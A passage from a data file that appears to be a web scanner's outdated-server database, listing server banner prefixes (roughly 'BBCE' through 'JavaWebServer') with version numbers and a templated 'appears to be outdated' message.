@CURRENT_VER)\"\n\"600083\",\"BBCE/\",\"6.6.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600084\",\"BeatBoxCapture/\",\"6.5.64\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600085\",\"Ben-SSL/\",\"1.60\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600086\",\"beta/\",\"0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600087\",\"BigFix HTTP Server/\",\"5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600088\",\"BillGatesSeinWebServer/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600089\",\"BiRD/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600090\",\"bkhttp/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600091\",\"Blazix/\",\"1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600092\",\"Bluestem/\",\"0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600093\",\"Boa/\",\"0.94.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600094\",\"BOA/\",\"1.2.2c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600095\",\"bozohttpd/\",\"20060517\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600096\",\"broker/\",\"8.7.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600097\",\"BRS-WebWeaver/\",\"1.33\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600098\",\"BSAFE-SSL-C/\",\"1.0.0i\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600099\",\"BSDI/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600100\",\"BunnyServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600101\",\"buser/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600102\",\"BustaWS/\",\"3.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600103\",\"bw/\",\"3.37\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600104\",\"BWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600105\",\"C2NetEU/\",\"3012\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600106\",\"C2NetUS/\",\"2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600107\",\"Canon Http Server \",\"2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600108\",\"Caudium/\",\"1.4.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600109\",\"CCO/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600110\",\"CERN/\",\"3.0A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600111\",\"CheckPointSVNfoundation/\",\"NGFP2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600112\",\"Cheetah/\",\"2.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600113\",\"Cherry/\",\"6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600114\",\"CherryPy/\",\"3.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600115\",\"Chili!Soft-ASP/\",\"3.6.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600116\",\"cisco-CPA/\",\"cisco-CPA/3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600117\",\"cisco-IOS/\",\"12.0 HTTP-server/1.0(1)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600118\",\"CiteHTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600119\",\"Citysearch-Apache/\",\"1.3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600120\",\"CL-HTTP\",\"70.190\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600121\",\"CM4all-JailCGI/\",\"1.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600122\",\"CMS_Pipelines/\",\"1.0110\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600123\",\"CMS/\",\"20.000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600124\",\"CoffeeMaker/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600125\",\"Commerce-Builder/\",\"2.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600126\",\"CommerceServer400/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600127\",\"CommuniGatePro/\",\"5.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600128\",\"Communique/\",\"4.2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600129\",\"CommuniqueServletEngine/\",\"4.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600130\",\"CompaqHTTPServer/\",\"9.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600131\",\"ConcentricHost-Ashurbanipal/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600132\",\"ConcentricHost-NaramSin/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600133\",\"ConductorSNMP/\",\"1.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600134\",\"ConferenceRoom/\",\"3.5.0.2-SEC.win32-ws2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600135\",\"confproxy/\",\"3.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600136\",\"CoolWeb/\",\"3.8.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600137\",\"Core/\",\"2.6.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600138\",\"Cougar \",\"9.01.01.5001\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600139\",\"covalent_auth/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600140\",\"CovalentSSL/\",\"2.1.03.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600141\",\"Coyote/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600142\",\"cpaneld/\",\"cpaneld/6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600143\",\"cpsrvd/\",\"11.32.3.21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600144\",\"Crossing/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600145\",\"Cryptoveg/\",\"4.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600146\",\"CSacek/\",\"2.1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600147\",\"Cthulhu/\",\"0.23a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600148\",\"CUPS/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600149\",\"da\\.ru/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600150\",\"DartWebServerTool/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600151\",\"DAV/\",\"2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600152\",\"David-WebBox/\",\"12.00a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600153\",\"Debut/\",\"1.08\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600154\",\"DeleGate/\",\"8.5.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600155\",\"DeltaEdgeCache/\",\"release-2-28-rc2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600156\",\"DHost/\",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600157\",\"diffprivs/\",\"20030624\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600158\",\"Dina HTTPd Server/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600159\",\"DinaHTTPdServer/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600160\",\"Dixienet/\",\"6.6.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600161\",\"DLXApache/\",\"4.3.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600162\",\"DMMWeb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600163\",\"Domestic/\",\"v2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600164\",\"Domino-Go-Webserver/\",\"4.6.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600165\",\"DotTV Webserver \",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600166\",\"DSS/\",\"6.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600167\",\"dwhttpd/\",\"dwhttpd/4.2a7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600168\",\"dynamicScale/\",\"2.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600169\",\"E-Neverland Data Palm/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600170\",\"e/FSV-\",\"28-01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600171\",\"eBD/\",\"3.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600172\",\"ebLogic XMLX Module \",\"8.1 SP1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600173\",\"EHTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600174\",\"EIMWebServer/\",\"3.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600175\",\"Embedded HTTP Server\",\"2.0f\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600176\",\"Embperl/\",\"2.3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600177\",\"EMWHTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600178\",\"Engine/\",\"7.02\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600179\",\"Enhydra-MultiServer/\",\"3.1.1b1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600180\",\"Entangle/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600181\",\"EnterpriseWeb/\",\"1.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600182\",\"ePerl/\",\"2.2.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600183\",\"Eplicator/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600184\",\"EPSON-HTTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600185\",\"EServ/\",\"3.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600186\",\"ESMWEBSERVERS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600187\",\"eVisMUX/\",\"6.0.51212128\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600188\",\"EWS-NIC3/\",\"6.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600189\",\"EWS-NIC4/\",\"8.43\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600190\",\"Ews/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600191\",\"Export/\",\"v2.0-1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600192\",\"exteNdApplicationServer/\",\"100.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600193\",\"ExtraWeb/\",\"4.0.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600194\",\"fhttpd/\",\"0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600195\",\"FileMakerPro/\",\"6.0v4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600196\",\"filter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600197\",\"FireSite/\",\"2.7_PPC\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600198\",\"FirstClass/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600199\",\"FJapache/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600200\",\"fnord-spb/\",\"280604\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600201\",\"fnord/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600202\",\"FooServe/\",\"0.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600203\",\"Footprint\",\"4.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600204\",\"FortiWeb-\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600205\",\"FoundryNetworks/\",\"2.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600206\",\"fp/\",\"4.0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600207\",\"FPWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600208\",\"FreezeServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600209\",\"Frontier/\",\"9.1b2-MacOSX\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600210\",\"FrontPage-PWS32/\",\"4.0.2.2717\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600211\",\"FrontPage/\",\"5.0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) (may depend on server version)\"\n\"600212\",\"FSID/\",\"M25-8514\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600213\",\"FSPMS/\",\"5.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600214\",\"FT::Srv/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600215\",\"FTU/\",\"2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600216\",\"Fujitsu-InfoProvider-Pro/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600217\",\"Fujitsu-InfoProvider-Pro/V\",\"3.0L20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600218\",\"Ganesh/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600219\",\"gettxt/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600220\",\"GFE/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600221\",\"GG/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600222\",\"giFT-Gnutella/\",\"0.0.10.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600223\",\"glass/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600224\",\"GMSE_Sandcastle/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600225\",\"Gnat-Box/\",\"3.3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600226\",\"GNNserver/\",\"2.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600227\",\"GoAhead-Webs/\",\"2.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600228\",\"GoAhead/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600229\",\"GoGoGadgetWebserver/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600230\",\"GordianEmbedded/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600231\",\"GoServe/\",\"2.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600232\",\"Ground/\",\"5.3.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600233\",\"GTS-Datanet/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600234\",\"GTS/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600235\",\"gtxs/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600236\",\"GUILD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600237\",\"GWS/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600238\",\"HackersLabWebServer/\",\"7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600239\",\"Hardened-PHP/\",\"5.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600240\",\"HavelsanEmbeddedQuix/\",\"18.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600241\",\"Hawkeye/\",\"1.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600242\",\"heitml/\",\"2.05\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600243\",\"Hitmatic/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600244\",\"HomeGrownServer/\",\"10.3.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600245\",\"Homepage-Engine/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600246\",\"HP Apache-based Web Server/\",\"1.3.27 (Unix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600247\",\"HP Web Jetadmin/\",\"2.0.50\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600248\",\"HP-ChaiServer/\",\"HP-ChaiServer/3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600249\",\"HP-ChaiSOE/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600250\",\"HP-UX_Apache-based_Web_Server/\",\"2.0.48\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600251\",\"Hp-Web-JetAdmin-\",\"5.06.190\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600252\",\"Hp-Web-Server-\",\"3.00.1696\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600253\",\"HPWB/\",\"4.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600254\",\"HSP/\",\"2.10.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600255\",\"HTS/\",\"2.99\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600256\",\"HTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600257\",\"HTTPd-WASD/\",\"10.1.1O\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600258\",\"httpd/\",\"2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600259\",\"HTTPlistener/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600260\",\"HTTPS/\",\"0.991\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600261\",\"HttpStk/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600262\",\"Hunn/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600263\",\"HyNetOS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600264\",\"Hyperwave-Information-Server/\",\"5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600265\",\"Hyperwave-IS/\",\"6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600266\",\"IBM HTTP Server/\",\"V5R3M0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600267\",\"IBM_HTTP_Server/\",\"7.0.0.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600268\",\"IBM-HTTP-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600269\",\"IBM-ICS/\",\"4.2.1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600270\",\"IBM-PROXY-WTE-US/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600271\",\"IBM-PROXY-WTE/\",\"6f.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600272\",\"IBMHTTPServer/\",\"V5R3M0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600273\",\"icecast/\",\"icecast/1.3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600274\",\"IceWarp/\",\"12.2.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600275\",\"IceWarpWebSrv/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600276\",\"ID/\",\"878810\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600277\",\"IdeaWebServer/\",\"v0.80\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600278\",\"IDS-Server/\",\"4.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600279\",\"IgServ/\",\"1.0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600280\",\"iHTML/\",\"2.20.324\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600281\",\"IIS/\",\"7.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600282\",\"Inc.onz/\",\"VMV4R4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600283\",\"include/\",\"3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600284\",\"Indy/\",\"10.0.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600285\",\"inets/\",\"5.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600286\",\"Infrastructure/\",\"4.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600287\",\"Inktomi Search\",\"4.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600288\",\"Intel NetportExpressPro/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600289\",\"Interaction/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600290\",\"Interambition HTTPd/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600291\",\"InterambitionHTTPd/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600292\",\"InterJet/\",\"3.2.1p16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600293\",\"InterSpace HTTP Tunneling/\",\"1.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600294\",\"InterSpaceFDS/\",\"2.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600295\",\"InterSpaceHTTPTunneling/\",\"1.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600296\",\"Intrusion/\",\"1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600297\",\"IPCheck/\",\"5.4.0.796\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600298\",\"IPL/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600299\",\"iPlanet-Enterprise/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600300\",\"iPlanet-Web-Proxy-Server/\",\"3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600301\",\"iPlanetEnterprise/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600302\",\"ipMonitor \",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600303\",\"iPrism-httpd/\",\"v3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600304\",\"Ipswitch-IMail/\",\"8.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600305\",\"IpswitchWebCalendaring/\",\"8.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600306\",\"iPyramid.system/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600307\",\"ISS-PXServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600308\",\"iTPSecureWebServer/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600309\",\"iTunes/\",\"4.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600310\",\"IXOS-eCON/\",\"5.0A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600311\",\"J2EE SDK/\",\"1.3.1 (HTTP/1.1 Connector)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600312\",\"J2EESDK/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600313\",\"JAGeX/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600314\",\"JaguarServerVersion/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600315\",\"Jana-Server/\",\"2.4.6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600316\",\"JanaServer/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600317\",\"JARING/\",\"10.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600318\",\"java/\",\"1.7.0_656\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600319\",\"JavaHttpServer/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600320\",\"JavaWebServer/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least 